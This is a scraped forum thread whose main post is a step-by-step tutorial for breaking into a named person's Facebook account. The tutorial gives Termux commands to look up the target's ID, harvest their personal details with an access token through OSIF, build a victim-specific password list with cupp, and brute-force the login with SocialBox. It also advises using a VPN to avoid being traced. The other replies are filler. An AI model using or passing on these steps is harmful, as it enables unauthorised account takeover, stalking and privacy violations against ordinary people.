Welcome to Mobilarian Forum - Official Symbianize forum.

Join us now to get access to all our features. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, and so, so much more. It's also quick and totally free, so what are you waiting for?

Advanced Tutorial HACK FACEBOOK ACCOUNT

Alexhost
D 0

DartZi

Abecedarian
Member
Access
Joined
Dec 28, 2020
Messages
68
Reaction score
3
Points
8
grants
₲899
3 years of service
systemnotfound" pid="32883" dateline="1605490462 said:
[align=center]
1f643.png
Tests test test


Thanks thanks
 
mvjimeno 0

mvjimeno

Abecedarian
BANNED
Member
Access
Joined
Jan 20, 2021
Messages
120
Reaction score
28
Points
18
Age
36
Location
quezon city
grants
₲1,205
3 years of service
[
Please, Log in or Register to view URLs content!

Please, Log in or Register to view URLs content!


  • To view download links. Like the first post, reply and then refresh your browser.

Advanced Tutorial HACK FACEBOOK ACCOUNT​

Please, Log in or Register to view URLs content!

S 0

systemnotfound

Learning​


katz Ardent
[font=Raleway,]
You must click 'Like' before you can see the hidden data contained here
????????[/font]
You must click 'Like' before you can see the hidden data contained here


[font=Raleway,]??? ?? ???? ? ???????? ??????? ?? ??????? [/font][img=22x0]
Please, Log in or Register to view URLs content!




[font=Raleway,]Many people are sending you only link like bitly to the tool and copy only description, like hacking empire etc. Now let's get fucking ready, and start the real tutorial[/font]

[img=22x0]
Please, Log in or Register to view URLs content!
????????????

➤ Termux [/font][img=22x0]
Please, Log in or Register to view URLs content!

[font=Raleway,]➤ 200 MB Free Space [/font][img=22x0]
Please, Log in or Register to view URLs content!

[font=Raleway,]➤ A Facebook Target Link (Ex.: [/font]
Please, Log in or Register to view URLs content!
[font=Raleway,]) [/font][img=22x0]
Please, Log in or Register to view URLs content!

[font=Raleway,]➤ Information About Target [/font][img=22x0]
Please, Log in or Register to view URLs content!

[font=Raleway,]➤ Root[/font]

[img=22x0]
Please, Log in or Register to view URLs content!
?????

$ apt install nodejs -y

$ pkg install git tsu -y

$ apt install python python2 -y

$ apt update; apt upgrade -y

$ npm install --global facebook-id-of[/font]

[img=22x0]
Please, Log in or Register to view URLs content!
Getting ID

The first what we need is the ID of the facebook user, this can be found out through the facebook-id-of tool, which we have installed.

On the target profile, we can see URL like this:[/font]
Please, Log in or Register to view URLs content!
[font=Raleway,] — Remove the hyperlink and copy online name after facebook.com/.

$ facebook-id-of michael.schmidt.7965692

› Facebook ID of michael.schmidt.7965692 is 671393100[/font]

[img=22x0]
Please, Log in or Register to view URLs content!
Dumping Information About Target

For this, we're gonna using the tool OSIF, it's still working and helping us, to get some details.

$ pkg update upgrade

$ pkg install git python2

$ git clone [/font]
Please, Log in or Register to view URLs content!


[font=Raleway,]$ cd OSIF

$ pip2 install -r requirements.txt

For this tool you need a working, non 2FA facebook account, which can be used for scanning our target. (TARGET MUST EXIST IN FRIEND LIST)

$ python2 osif.py
D3b2y >> token
Type username (email) & Password.

D3b2y >> cat_token[/font]

[*] Your access token !!

[*]

[font=Raleway,]EAAAA.....

Well, we are done with setup.
D3b2y >> dump_id
D3b3y >> dump_671393100

This fetching some informations about our target an example can be found here:

Please, Log in or Register to view URLs content!
[/font]
[*][font=Raleway,]
Please, Log in or Register to view URLs content!
[/font]
[*][font=Raleway,]
Please, Log in or Register to view URLs content!
[/font]
[*][font=Raleway,]
Pastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time.
[img=12x0]
Please, Log in or Register to view URLs content!
pastebin.com[/font]
[*]

[font=Raleway,]If you know your targets e-mail, it's much easier to attack them from the »bruteforce« tool.

D3b3y » dump_mail[/font]

[img=22x0]
Please, Log in or Register to view URLs content!
Creating Wordlist For Bruteforce Attack

While people downloading random wordlists, creating wordlist with crunch and trying any other method with much effort, we can easily generate a wordlist related to information about our victim. This method has helped me several times to get into an Instagram account.

$ git clone [/font]
Please, Log in or Register to view URLs content!
[font=Raleway,] cd cupp/

$ python3 cupp.py -i

After tool has been started, fill out the information which you have dumped with OSIF.
It's asking :
Do you want to add some key words about the victim? Y/[N]: y

Please enter the words, separated by comma. [i.e. hacker,juice,black], spaces will be removed: football,blue,dog,maddisonschoolmarvelmovies,black,michaeljackson

Do you want to add special chars at the end of words? Y/[N]: n

Do you want to add some random numbers at the end of words? Y/[N]:y

Leet mode? (i.e. leet = 1337) Y/[N]: y

$ cp -R test.txt $HOME

Choose same, if you need keyword put all keywords about target, if you target likes barcelona football club, type barcelona,football.
These keywords can be anything the victim likes. Mother's name, hobbies, favorite movies, food, color, sports, etc.

It's saved as name, as you used for the firstname. If you don't know partner, use any best friend information, there are few apps like tellonym.me, instagram.com, snapchat.com to fetch as much information as you need.[/font]

[img=22x0]
Please, Log in or Register to view URLs content!
Bruteforcing The Account

$ pkg install nano -y

$ git clone [/font]
Please, Log in or Register to view URLs content!
[font=Raleway,] cd SocialBox; chmod +x *.sh

$ nano install-sb.sh

Edit all sudo lines, only remove sudo:
sudo apt-get update
After:
apt update

Exit — ctrl+x — y (yes) — enter.

$ ./install-sb.sh

$ cp -R $HOME/test.txt $PWD

$ ./SocialBox.sh

CP means we are copying our text file from cupp folder to home, then from home to the socialbox folder. Do it, you need in social a wordlist which has been created. If you don't want to copy it :

Choice > 1
Enter Facebook ID / Email / Username / Number: 671393100
Enter wordlist path : $HOME/cupp/test.txt

Now the Bruterforcer will start to read your password list, or the word list you specified, and then try to test the password in the background using YOUR IP address. I have also tried to crack a Facebook account a few times, please use a VPN!

Enjoy
[/font][img=22x0]
Please, Log in or Register to view URLs content!

[/font][img=22x0]
Please, Log in or Register to view URLs content!
 
Top Bottom